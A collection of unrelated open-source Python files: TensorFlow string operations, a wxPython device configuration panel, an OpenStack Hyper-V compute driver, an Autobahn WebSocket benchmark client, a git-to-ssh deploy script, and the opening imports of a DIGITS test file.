treated as a set of delimiters with each considered a potential split point.
For example:
N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output
will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
Args:
source: `1-D` string `Tensor`, the strings to split.
delimiter: `0-D` string `Tensor`, the delimiter character, the string should
be length 0 or 1.
skip_empty: A `bool`. If `True`, skip the empty strings from the result.
Raises:
ValueError: If delimiter is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split(
source, delimiter=delimiter, skip_empty=skip_empty)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
@tf_export("strings.split")
def string_split_v2(source, sep=None, maxsplit=-1):
"""Split elements of `source` based on `sep` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `sep` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c',
then the output will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
If `sep` is given, consecutive delimiters are not grouped together and are
deemed to delimit empty strings. For example, source of `"1<>2<><>3"` and
sep of `"<>"` returns `["1", "2", "", "3"]`. If `sep` is None or an empty
string, consecutive whitespace are regarded as a single separator, and the
result will contain no empty strings at the startor end if the string has
leading or trailing whitespace.
Note that the above mentioned behavior matches python's str.split.
Args:
source: `1-D` string `Tensor`, the strings to split.
sep: `0-D` string `Tensor`, the delimiter character.
maxsplit: An `int`. If `maxsplit > 0`, limit of the split of the result.
Raises:
ValueError: If sep is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
if sep is None:
sep = ""
sep = ops.convert_to_tensor(sep, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split_v2(
source, sep=sep, maxsplit=maxsplit)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
def _reduce_join_reduction_dims(x, axis, reduction_indices):
"""Returns range(rank(x) - 1, 0, -1) if reduction_indices is None."""
# TODO(aselle): Remove this after deprecation
if reduction_indices is not None:
if axis is not None:
raise ValueError("Can't specify both 'axis' and 'reduction_indices'.")
axis = reduction_indices
if axis is not None:
return axis
else:
# Fast path: avoid creating Rank and Range ops if ndims is known.
if x.get_shape().ndims is not None:
return constant_op.constant(
np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32)
# Otherwise, we rely on Range and Rank to do the right thing at run-time.
return math_ops.range(array_ops.rank(x) - 1, -1, -1)
@tf_export(v1=["strings.reduce_join", "reduce_join"])
@deprecation.deprecated_endpoints("reduce_join")
def reduce_join(inputs, axis=None, # pylint: disable=missing-docstring
keep_dims=False,
separator="",
name=None,
reduction_indices=None):
inputs_t = ops.convert_to_tensor(inputs)
reduction_indices = _reduce_join_reduction_dims(
inputs_t, axis, reduction_indices)
return gen_string_ops.reduce_join(
inputs=inputs_t,
reduction_indices=reduction_indices,
keep_dims=keep_dims,
separator=separator,
name=name)
@tf_export("strings.reduce_join", v1=[])
def reduce_join_v2( # pylint: disable=missing-docstring
inputs,
axis=None,
keepdims=False,
separator="",
name=None):
return reduce_join(
inputs, axis, keep_dims=keepdims, separator=separator, name=name)
reduce_join.__doc__ = deprecation.rewrite_argument_docstring(
gen_string_ops.reduce_join.__doc__, "reduction_indices", "axis")
reduce_join.__doc__ = reduce_join.__doc__.replace("tf.reduce_join(",
"tf.strings.reduce_join(")
# This wrapper provides backwards compatibility for code that predates the
# unit argument and that passed 'name' as a positional argument.
@tf_export(v1=["strings.length"])
@dispatch.add_dispatch_support
def string_length(input, name=None, unit="BYTE"):
return gen_string_ops.string_length(input, unit=unit, name=name)
@tf_export("strings.length", v1=[])
@dispatch.add_dispatch_support
def string_length_v2(input, unit="BYTE", name=None):
return string_length(input, name, unit)
string_length.__doc__ = gen_string_ops.string_length.__doc__
@tf_export(v1=["substr"])
@deprecation.deprecated(None, "Use `tf.strings.substr` instead of `tf.substr`.")
def substr_deprecated(input, pos, len, name=None, unit="BYTE"):
return substr(input, pos, len, name=name, unit=unit)
substr_deprecated.__doc__ = gen_string_ops.substr.__doc__
@tf_export(v1=["strings.substr"])
@dispatch.add_dispatch_support
def substr(input, pos, len, name=None, unit="BYTE"):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr.__doc__ = gen_string_ops.substr.__doc__
@tf_export("strings.substr", v1=[])
@dispatch.add_dispatch_support
def substr_v2(input, pos, len, unit="BYTE", name=None):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr_v2.__doc__ = gen_string_ops.substr.__doc__
ops.NotDifferentiable("RegexReplace")
ops.NotDifferentiable("StringToHashBucket")
ops.NotDifferentiable("StringToHashBucketFast")
ops.NotDifferentiable("StringToHashBucketStrong")
ops.NotDifferentiable("ReduceJoin")
ops.NotDifferentiable("StringJoin")
ops.NotDifferentiable("StringSplit")
ops.NotDifferentiable("AsString")
ops.NotDifferentiable("EncodeBase64")
ops.NotDifferentiable("DecodeBase64")
@tf_export("strings.to_number", v1=[])
@dispatch.add_dispatch_support
def string_to_number(input, out_type=dtypes.float32, name=None):
r"""Converts each string in the input Tensor to the specified numeric type.
(Note that int32 overflow results in an error while float overflow
results in a rounded value.)
Args:
input: A `Tensor` of type `string`.
out_type: An optional `tf.DType` from: `tf.float32, tf.float64, tf.int32,
tf.int64`. Defaults to `tf.float32`.
The numeric type to interpret each string in `string_tensor` as.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `out_type`.
"""
return gen_parsing_ops.string_to_number(input, out_type, name)
tf_export(v1=["strings.to_number", "string_to_number"])(
gen_parsing_ops.string_to_number
)
@tf_export("strings.to_hash_bucket", v1=[])
@dispatch.add_dispatch_support
def string_to_hash_bucket(input, num_buckets, name=None):
# pylint: disable=line-too-long
r"""Converts each string in the input Tensor to its hash mod by a number of buckets.
The hash function is deterministic on the content of the string within the
process.
Note that the hash function may change from time to time.
This functionality will be deprecated and it's recommended to use
`tf.string_to_hash_bucket_fast()` or `tf.string_to_hash_bucket_strong()`.
Args:
input: A `Tensor` of type `string`.
num_buckets: An `int` that is `>= 1`. The number of buckets.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
# pylint: enable=line-too-long
return gen_string_ops.string_to_hash_bucket(input, num_buckets, name)
tf_export(v1=["strings.to_hash_bucket", "string_to_hash_bucket"])(
gen_string_ops.string_to_hash_bucket
)
|
|
import ObjectListView
from threading import Thread
from time import sleep
import wx
from spacq.devices.config import DeviceConfig
from ..tool.box import MessageDialog
from .device.device_config import DeviceConfigDialog
"""
An interface for creating and editing DeviceConfig objects.
"""
class DeviceColumnDefn(ObjectListView.ColumnDefn):
"""
A column with useful defaults.
"""
def __init__(self, align='left', *args, **kwargs):
ObjectListView.ColumnDefn.__init__(self, align=align, *args, **kwargs)
# No auto-width if space filling.
if self.isSpaceFilling:
self.width = 0
class DevicesPanel(wx.Panel):
col_name = DeviceColumnDefn(title='Name', valueGetter='name', width=200)
col_connection = DeviceColumnDefn(title='Connection', width=110,
valueGetter=lambda x: '{0}onnected'.format('C' if x.device is not None else 'Disc'))
col_setup = DeviceColumnDefn(title='Setup', width=70,
valueGetter=lambda x: 'Setup...' if x.gui_setup is not None else '')
col_status = DeviceColumnDefn(title='Status', isSpaceFilling=True, isEditable=False,
valueGetter=lambda x: (x.device.status[0] if x.device.status else 'Idle') if x.device is not None else '')
def __init__(self, parent, global_store, dialog_owner, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.dialog_owner = dialog_owner
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## OLV.
self.olv = ObjectListView.FastObjectListView(self)
panel_box.Add(self.olv, proportion=1, flag=wx.ALL|wx.EXPAND)
self.olv.SetColumns([self.col_name, self.col_connection, self.col_setup, self.col_status])
self.olv.SetSortColumn(self.col_name)
self.olv.cellEditMode = self.olv.CELLEDIT_DOUBLECLICK
self.olv.Bind(ObjectListView.EVT_CELL_EDIT_STARTING, self.OnCellEditStarting)
self.olv.Bind(ObjectListView.EVT_CELL_EDIT_FINISHING, self.OnCellEditFinishing)
## Buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
panel_box.Add(button_box, proportion=0, flag=wx.ALL|wx.CENTER)
### Row buttons.
row_box = wx.BoxSizer(wx.HORIZONTAL)
button_box.Add(row_box)
add_button = wx.Button(self, wx.ID_ADD)
add_button.Bind(wx.EVT_BUTTON, self.OnAddDevice)
row_box.Add(add_button)
remove_button = wx.Button(self, wx.ID_REMOVE)
remove_button.Bind(wx.EVT_BUTTON, self.OnRemoveDevices)
row_box.Add(remove_button)
self.SetMinSize((600, 250))
self.SetSizer(panel_box)
with self.global_store.devices.lock:
for name, dev in self.global_store.devices.iteritems():
self.olv.AddObject(dev)
def update_resources(self, old, new):
"""
Inform everybody of updated resources.
"""
(appeared, changed, disappeared) = old.diff_resources(new)
with self.global_store.resources.lock:
# Check for conflicts.
conflicting_resources = [label for label in appeared if label in self.global_store.resources]
if conflicting_resources:
return conflicting_resources
# Set up the resources.
for label in disappeared.union(changed):
del self.global_store.resources[label]
for label in appeared.union(changed):
self.global_store.resources[label] = new.resources[label]
return []
def OnCellEditStarting(self, evt):
col = evt.objectListView.columns[evt.subItemIndex]
dev = evt.rowModel
# Ignore frivolous requests.
if evt.rowIndex < 0:
evt.Veto()
return
veto = False
if col == self.col_connection:
def ok_callback(dlg):
dev_new = dlg.GetValue()
# Use the new instance.
with self.global_store.devices.lock:
del self.global_store.devices[dev.name]
self.global_store.devices[dev_new.name] = dev_new
conflicting_resources = self.update_resources(dev, dev_new)
if conflicting_resources:
MessageDialog(self, ', '.join(conflicting_resources), 'Conflicting resources').Show()
return False
# Close the old device as necessary.
if dev.device is not None and dev_new.device != dev.device:
dev.device.close()
self.olv.RemoveObject(dev)
self.olv.AddObject(dev_new)
return True
dlg = DeviceConfigDialog(self, ok_callback, title=dev.name)
dlg.SetValue(dev)
dlg.Show()
veto = True
elif col == self.col_setup:
if dev.gui_setup is not None:
dev.gui_setup(self.dialog_owner, self.global_store, dev.name).Show()
veto = True
if veto:
# No need to use the default editor.
evt.Veto()
def OnCellEditFinishing(self, evt):
col = evt.objectListView.columns[evt.subItemIndex]
if col == self.col_name:
dev = evt.rowModel # With old name.
dev_new_name = evt.editor.Value
if dev_new_name == dev.name:
# Not actually changed.
return
# Attempt to add a new entry first.
try:
self.global_store.devices[dev_new_name] = dev
except KeyError:
MessageDialog(self, dev_new_name, 'Device name conflicts').Show()
evt.Veto()
return
# Remove the old entry.
del self.global_store.devices[dev.name]
def OnAddDevice(self, evt=None):
"""
Add a blank variable to the OLV.
"""
# Ensure that we get a unique name.
with self.global_store.devices.lock:
num = 1
done = False
while not done:
name = 'New device {0}'.format(num)
dev_cfg = DeviceConfig(name=name)
try:
self.global_store.devices[name] = dev_cfg
except KeyError:
num += 1
else:
done = True
self.olv.AddObject(dev_cfg)
# OLV likes to select a random item at this point.
self.olv.DeselectAll()
def OnRemoveDevices(self, evt=None):
"""
Remove all selected variables from the OLV.
"""
selected = self.olv.GetSelectedObjects()
connected_devices = set()
for row in selected:
if row.device is not None:
connected_devices.add(row.name)
if connected_devices:
MessageDialog(self, ', '.join(sorted(connected_devices)), 'Devices still connected').Show()
return
if selected:
self.olv.RemoveObjects(selected)
for row in selected:
del self.global_store.devices[row.name]
class DeviceConfigFrame(wx.Frame):
def __init__(self, parent, global_store, close_callback, *args, **kwargs):
wx.Frame.__init__(self, parent, title='Device Configuration', *args, **kwargs)
self.close_callback = close_callback
# Frame.
frame_box = wx.BoxSizer(wx.VERTICAL)
## Devices.
self.devices_panel = DevicesPanel(self, global_store, parent)
frame_box.Add(self.devices_panel, proportion=1, flag=wx.EXPAND)
self.SetSizerAndFit(frame_box)
self.Bind(wx.EVT_CLOSE, self.OnClose)
thr = Thread(target=self.status_poller)
thr.daemon = True
thr.start()
def status_poller(self):
"""
Keep updating the status as long as the frame is open.
"""
while True:
try:
wx.CallAfter(self.devices_panel.olv.RefreshObjects)
except wx.PyDeadObjectError:
# The panel has left the building.
return
sleep(0.2)
def OnClose(self, evt):
self.close_callback()
evt.Skip()
|
|
# Copyright (c) 2010 Cloud.com, Inc
# Copyright (c) 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A Hyper-V Nova Compute driver.
"""
import platform
from oslo_log import log as logging
from nova.i18n import _
from nova.virt import driver
from nova.virt.hyperv import hostops
from nova.virt.hyperv import livemigrationops
from nova.virt.hyperv import migrationops
from nova.virt.hyperv import rdpconsoleops
from nova.virt.hyperv import snapshotops
from nova.virt.hyperv import vmops
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
class HyperVDriver(driver.ComputeDriver):
def __init__(self, virtapi):
super(HyperVDriver, self).__init__(virtapi)
self._hostops = hostops.HostOps()
self._volumeops = volumeops.VolumeOps()
self._vmops = vmops.VMOps()
self._snapshotops = snapshotops.SnapshotOps()
self._livemigrationops = livemigrationops.LiveMigrationOps()
self._migrationops = migrationops.MigrationOps()
self._rdpconsoleops = rdpconsoleops.RDPConsoleOps()
def init_host(self, host):
self._vmops.restart_vm_log_writers()
def list_instance_uuids(self):
return self._vmops.list_instance_uuids()
def list_instances(self):
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
self._vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
self._vmops.reboot(instance, network_info, reboot_type)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._vmops.destroy(instance, network_info, block_device_info,
destroy_disks)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
"""Cleanup after instance being destroyed by Hypervisor."""
pass
def get_info(self, instance):
return self._vmops.get_info(instance)
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
return self._volumeops.attach_volume(connection_info,
instance.name)
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
return self._volumeops.detach_volume(connection_info,
instance.name)
def get_volume_connector(self, instance):
return self._volumeops.get_volume_connector(instance)
def get_available_resource(self, nodename):
return self._hostops.get_available_resource()
def get_available_nodes(self, refresh=False):
return [platform.node()]
def host_power_action(self, action):
return self._hostops.host_power_action(action)
def snapshot(self, context, instance, image_id, update_task_state):
self._snapshotops.snapshot(context, instance, image_id,
update_task_state)
def pause(self, instance):
self._vmops.pause(instance)
def unpause(self, instance):
self._vmops.unpause(instance)
def suspend(self, context, instance):
self._vmops.suspend(instance)
def resume(self, context, instance, network_info, block_device_info=None):
self._vmops.resume(instance)
def power_off(self, instance, timeout=0, retry_interval=0):
self._vmops.power_off(instance, timeout, retry_interval)
def power_on(self, context, instance, network_info,
block_device_info=None):
self._vmops.power_on(instance, block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""Resume guest state when a host is booted."""
self._vmops.resume_state_on_host_boot(context, instance, network_info,
block_device_info)
def live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
self._livemigrationops.live_migration(context, instance, dest,
post_method, recover_method,
block_migration, migrate_data)
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
self.destroy(context, instance, network_info, block_device_info)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
self._livemigrationops.pre_live_migration(context, instance,
block_device_info,
network_info)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
self._livemigrationops.post_live_migration(context, instance,
block_device_info)
def post_live_migration_at_destination(self, context, instance,
network_info,
block_migration=False,
block_device_info=None):
self._livemigrationops.post_live_migration_at_destination(
context,
instance,
network_info,
block_migration)
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
return self._livemigrationops.check_can_live_migrate_destination(
context, instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
self._livemigrationops.check_can_live_migrate_destination_cleanup(
context, dest_check_data)
def check_can_live_migrate_source(self, context, instance,
dest_check_data, block_device_info=None):
return self._livemigrationops.check_can_live_migrate_source(
context, instance, dest_check_data)
def get_instance_disk_info(self, instance, block_device_info=None):
pass
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
msg = _("VIF plugging is not supported by the Hyper-V driver.")
raise NotImplementedError(msg)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
msg = _("VIF unplugging is not supported by the Hyper-V driver.")
raise NotImplementedError(msg)
def ensure_filtering_rules_for_instance(self, instance, network_info):
LOG.debug("ensure_filtering_rules_for_instance called",
instance=instance)
def unfilter_instance(self, instance, network_info):
LOG.debug("unfilter_instance called", instance=instance)
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
return self._migrationops.migrate_disk_and_power_off(context,
instance, dest,
flavor,
network_info,
block_device_info,
timeout,
retry_interval)
def confirm_migration(self, migration, instance, network_info):
self._migrationops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
self._migrationops.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
self._migrationops.finish_migration(context, migration, instance,
disk_info, network_info,
image_meta, resize_instance,
block_device_info, power_on)
def get_host_ip_addr(self):
return self._hostops.get_host_ip_addr()
def get_host_uptime(self):
return self._hostops.get_host_uptime()
def get_rdp_console(self, context, instance):
return self._rdpconsoleops.get_rdp_console(instance)
def get_console_output(self, context, instance):
return self._vmops.get_console_output(instance)
|
|
###############################################################################
##
## Copyright 2012-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ['startClient', 'startServer']
import sys, json, pprint
from twisted.internet import reactor
from autobahn.websocket import WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
from autobahn.util import newid
class WsPerfControlProtocol(WebSocketClientProtocol):
"""
A client for wsperf running in server mode.
stress_test:
token: Token included in test results.
uri: WebSocket URI of testee.
handshake_delay: Delay in ms between opening new WS connections. What about failed connection attempts?
connection_count: How many WS connections to open. Definitely opened, or excluding failed?
con_duration: How long the WS sits idle before closing the WS. How does that work if msg_count > 0?
con_lifetime: ?
msg_count: Number of messages per WS connection.
msg_size: Size of each message.
msg_mode: ?
?: ? Any other? What about the other parameters available in message_test?
"""
WSPERF_CMDS = {"echo": """message_test:uri=%(uri)s;token=%(token)s;size=%(size)d;count=%(count)d;quantile_count=%(quantile_count)d;timeout=%(timeout)d;binary=%(binary)s;sync=%(sync)s;rtts=%(rtts)s;correctness=%(correctness)s;""",
"stress": """stress_test:uri=%(uri)s;token=%(token)s;handshake_delay=%(handshake_delay)d;connection_count=%(connection_count)d;%(con_duration)d;msg_count=%(msg_count)d;msg_size=%(msg_size)d;rtts=%(rtts)s;"""
}
def sendNext(self):
if self.currentTestset == len(self.testsets):
return True
else:
if self.currentTest == len(self.testsets[self.currentTestset][1]):
self.currentTestset += 1
self.currentTest = 0
return self.sendNext()
else:
test = self.testsets[self.currentTestset][1][self.currentTest]
cmd = self.WSPERF_CMDS[test['mode']] % test
if self.factory.debugWsPerf:
print "Starting test for testee %s" % test['name']
print cmd
sys.stdout.write('.')
self.sendMessage(cmd)
self.currentTest += 1
return False
def setupTests(self):
i = 0
cnt = 0
for testset in self.factory.spec['testsets']:
self.testsets.append((testset, []))
for server in self.factory.spec['servers']:
for case in testset['cases']:
id = newid()
if testset['mode'] == 'echo':
test = {'token': id,
'mode': testset['mode'],
'uri': server['uri'].encode('utf8'),
'name': server['name'].encode('utf8'),
'quantile_count': testset['options']['quantile_count'],
'rtts': 'true' if testset['options']['rtts'] else 'false',
'count': case['count'] if case.has_key('count') else testset['options']['count'],
'size': case['size'] if case.has_key('size') else testset['options']['size'],
'timeout': case['timeout'] if case.has_key('timeout') else testset['options']['timeout'],
'binary': 'true' if (case['binary'] if case.has_key('binary') else testset['options']['binary']) else 'false',
'sync': 'true' if (case['sync'] if case.has_key('sync') else testset['options']['sync']) else 'false',
'correctness': 'exact' if (case['verify'] if case.has_key('verify') else testset['options']['verify']) else 'length',
'count': case['count'] if case.has_key('count') else testset['options']['count']
}
else:
raise Exception("unknown mode %s" % testset['mode'])
self.testsets[i][1].append(test)
cnt += 1
i += 1
sys.stdout.write("Running %d tests in total against %d servers: " % (cnt, len(self.factory.spec['servers'])))
def toMicroSec(self, value, digits = 0):
return ("%." + str(digits) + "f") % round(float(value), digits)
def getMicroSec(self, result, field, digits = 0):
return self.toMicroSec(result['data'][field], digits)
def onTestsComplete(self):
print " All tests finished."
print
if self.factory.debugWsPerf:
self.pp.pprint(self.testresults)
for testset in self.testsets:
if testset[0]['options'].has_key('outfile'):
outfilename = testset[0]['options']['outfile']
outfile = open(outfilename, 'w')
else:
outfilename = None
outfile = sys.stdout
if testset[0]['options'].has_key('digits'):
digits = testset[0]['options']['digits']
else:
digits = 0
if testset[0]['options'].has_key('sep'):
sep = testset[0]['options']['sep']
else:
sep = "\t"
if testset[0]['mode'] == 'echo':
outfile.write(sep.join(['name', 'outcome', 'count', 'size', 'min', 'median', 'max', 'avg', 'stddev']))
quantile_count = testset[0]['options']['quantile_count']
for i in xrange(quantile_count):
outfile.write(sep)
outfile.write("q%d" % i)
outfile.write('\n')
for test in testset[1]:
result = self.testresults[test['token']]
outcome = result['data']['result']
if outcome == 'connection_failed':
outfile.write(sep.join([test['name'], 'UNREACHABLE']))
outfile.write('\n')
elif outcome == 'time_out':
outfile.write(sep.join([test['name'], 'TIMEOUT']))
outfile.write('\n')
elif outcome == 'fail':
outfile.write(sep.join([test['name'], 'FAILED']))
outfile.write('\n')
elif outcome == 'pass':
outfile.write(sep.join([str(x) for x in [test['name'],
'PASSED',
test['count'],
test['size'],
self.getMicroSec(result, 'min', digits),
self.getMicroSec(result, 'median', digits),
self.getMicroSec(result, 'max', digits),
self.getMicroSec(result, 'avg', digits),
self.getMicroSec(result, 'stddev', digits),
]]))
for i in xrange(quantile_count):
outfile.write(sep)
if result['data'].has_key('quantiles'):
outfile.write(self.toMicroSec(result['data']['quantiles'][i][1]))
outfile.write('\n')
else:
raise Exception("unknown case outcome '%s'" % outcome)
if outfilename:
print "Test data written to %s." % outfilename
else:
raise Exception("logic error")
reactor.stop()
def onOpen(self):
self.pp = pprint.PrettyPrinter(indent = 3)
self.testresults = {}
self.testsets = []
self.currentTestset = 0
self.currentTest = 0
self.setupTests()
self.sendNext()
def onMessage(self, msg, binary):
if not binary:
try:
o = json.loads(msg)
if o['type'] == u'test_complete':
if self.sendNext():
self.onTestsComplete()
elif o['type'] == u'test_data':
if self.factory.debugWsPerf:
self.pp.pprint(o)
self.testresults[o['token']] = o
except ValueError, e:
pass
class WsPerfControlFactory(WebSocketClientFactory):
protocol = WsPerfControlProtocol
def startClient(wsuri, spec, debug = False):
factory = WsPerfControlFactory(wsuri)
factory.spec = spec
factory.debugWsPerf = spec['options']['debug']
connectWS(factory)
return True
|
|
#!/usr/bin/python
from subprocess import check_output, call, CalledProcessError
from re import split as regx_split
import argparse
def main():
args = process_args()
output = check_output(['git', 'status', '--porcelain', '-uno'])
filelist = output.split('\n')
for staged_file in filelist:
if staged_file:
if not deploy_code(staged_file, args):
print('An error occurs. Going out.')
return
def process_args():
arg_parser = argparse.ArgumentParser(description='deploy.py')
arg_parser.add_argument('host_address',
action='store',
help='The remote hostname and address. e.g. ubuntu@ip_address')
arg_parser.add_argument('git_root_path',
action='store',
help='The full path of remote git repository.')
arg_parser.add_argument('--port',
action='store',
default='22',
metavar='Port Number',
help='The port number of remote machine. Default is 22.')
arg_parser.add_argument('--force',
action='store_true',
help='Force deploy. Bypass the file permission.')
arg_parser.add_argument('--public_key',
action='store',
default='',
metavar='Public Key',
help='The public key for loggin in.')
return arg_parser.parse_args()
def deploy_code(staged_file, args):
if staged_file.startswith('MM') or staged_file.startswith(' '):
print('Please, stage your file correctly.')
return False
if staged_file.startswith('R'):
filename, new_filename = staged_file.split(' ')[1].split(' -> ')
deal_with_renaming(args, filename, new_filename)
elif staged_file.startswith('M'):
_, filename = staged_file.split(' ')
deal_with_modification(args, filename)
elif staged_file.startswith('A'):
_, filename = staged_file.split(' ')
deal_with_add(args, filename)
else:
print('Unsupported action. Pass.')
return True
def deal_with_renaming(args, filename, new_filename):
prefix_sudo = ''
should_recover_permission = False
if args.force:
original_permission, _, _ = seize_control(args, filename, 'f')
prefix_sudo = 'sudo su - -c '
should_recover_permission = True
print('Rename ' + filename + ' to ' + new_filename)
cmd = create_ssh_command(args.port,
args.host_address,
args.public_key,
True,
prefix_sudo + '"mv ' + args.git_root_path + filename + ' ' + args.git_root_path + new_filename +'"')
call(cmd)
filename = new_filename
if should_recover_permission:
change_file_permission(args.host_address,
args.port,
args.git_root_path,
filename, str(original_permission),
args.public_key)
def deal_with_modification(args, filename):
should_recover_permission = False
if args.force:
original_permission, _, _ = seize_control(args, filename, 'f')
should_recover_permission = True
print('scp ' + filename + ' to ' + args.git_root_path)
scp(args.port,
filename,
args.host_address + ':' + args.git_root_path + filename,
args.public_key)
if should_recover_permission:
change_file_permission(args.host_address,
args.port,
args.git_root_path,
filename, str(original_permission),
args.public_key)
def deal_with_add(args, filename):
try:
cmd = create_ssh_command(args.port,
args.host_address,
args.public_key,
False,
'ls ' + args.git_root_path + filename)
ls_output = check_output(cmd)
print(ls_output.rstrip() + ': already exists. Replace it.')
deal_with_modification(args, filename)
except CalledProcessError:
should_recover_permission = False
dirpath = ''
if args.force:
path_list = filename.rsplit('/', 1)
if len(path_list) > 1:
dirpath = path_list[0]
dir_permission, dir_owner, dir_group = seize_control(args, dirpath, 'd')
should_recover_permission = True
print('scp ' + filename + ' to ' + args.git_root_path)
scp(args.port,
filename,
args.host_address + ':' + args.git_root_path + filename,
args.public_key)
change_file_owngrp(args.host_address,
args.port,
args.git_root_path,
filename, dir_owner, dir_group, args.public_key)
if should_recover_permission:
change_file_permission(args.host_address,
args.port,
args.git_root_path,
dirpath, str(dir_permission), args.public_key)
def seize_control(args, target, type_):
permission = 0
if type_ is 'f':
ls_cmd = 'ls -al ' + args.git_root_path + target
elif type_ is 'd':
ls_cmd = 'ls -ald ' + args.git_root_path + target
else:
print('Unsupported Type')
# TODO Raise exception...
cmd = create_ssh_command(args.port,
args.host_address,
args.public_key,
False,
ls_cmd)
ls_output = check_output(cmd)
permission, owner, group = ls_parser(ls_output)
permission = permission_parser(permission)
change_file_permission(args.host_address,
args.port,
args.git_root_path,
target, '777', args.public_key)
return permission, owner, group
def ls_parser(ls_output):
permission, _, owner, group, _, _, _, _, _, _ = regx_split('\s+', ls_output)
return permission, owner, group
def permission_parser(permission_str):
permission = 0
permission_map = {
'r': 4,
'w': 2,
'x': 1,
'-': 0
}
for i in range(len(permission_str)):
if i == 0:
continue
elif i == 4 or i == 7:
permission *= 10
permission += permission_map[permission_str[i]]
return permission
def change_file_permission(host_address, port, git_root_path, filename, permission_str, public_key):
cmd = create_ssh_command(port,
host_address,
public_key,
True,
'sudo su - -c "chmod ' + permission_str + ' ' + git_root_path + filename + '"')
call(cmd)
def change_file_owngrp(host_address, port, git_root_path, filename, own_str, grp_str, public_key):
cmd = create_ssh_command(port,
host_address,
public_key,
True,
'sudo su - -c "chown ' + own_str + ':' + grp_str + ' ' + git_root_path + filename + '"')
call(cmd)
def create_ssh_command(port, host_address, public_key, is_sudo, command):
final_command = ['ssh']
if public_key:
final_command += ['-i', public_key]
final_command += ['-p', port]
if is_sudo:
final_command.append('-t')
final_command.append(host_address)
final_command.append(command)
# print final_command
return final_command
def scp(port, source, dest, public_key):
cmd = ['scp']
if public_key:
cmd += ['-i', public_key]
cmd += ['-P', port]
cmd.append(source)
cmd.append(dest)
# print cmd
call(cmd)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2015-2017, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import itertools
import json
import numpy as np
import os
import PIL.Image
import tempfile
import time
import unittest
# Find the best implementation available
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
